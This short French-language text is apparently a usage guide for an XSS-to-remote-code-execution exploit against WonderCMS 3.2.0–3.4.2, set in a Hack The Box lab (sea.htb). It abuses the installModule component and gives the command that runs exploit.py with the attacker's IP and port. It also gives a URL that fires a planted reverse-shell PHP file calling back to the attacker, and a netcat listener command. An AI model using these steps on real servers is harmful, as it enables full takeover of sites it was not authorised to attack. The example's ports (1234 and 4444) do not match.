
Injection XSS, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 est vulnérable. Les attaquants distants peuvent prendre le contrôle total du serveur en utilisant une exploitation de Cross-Site Scripting (XSS) (à des fins éducatives uniquement). Voici le plan :
L'exploit abuse du composant installModule de WonderCMS pour injecter un script conçu qui exécute du code arbitraire.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
Exemple
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
Si le reverse shell ne se déclenche pas automatiquement, rendez-vous simplement sur :
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
N'oubliez pas de démarrer un écouteur en utilisant la commande suivante :
nc -lvp 4444
prodigiousMind pour la découverte et le signalement de la vulnérabilité https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413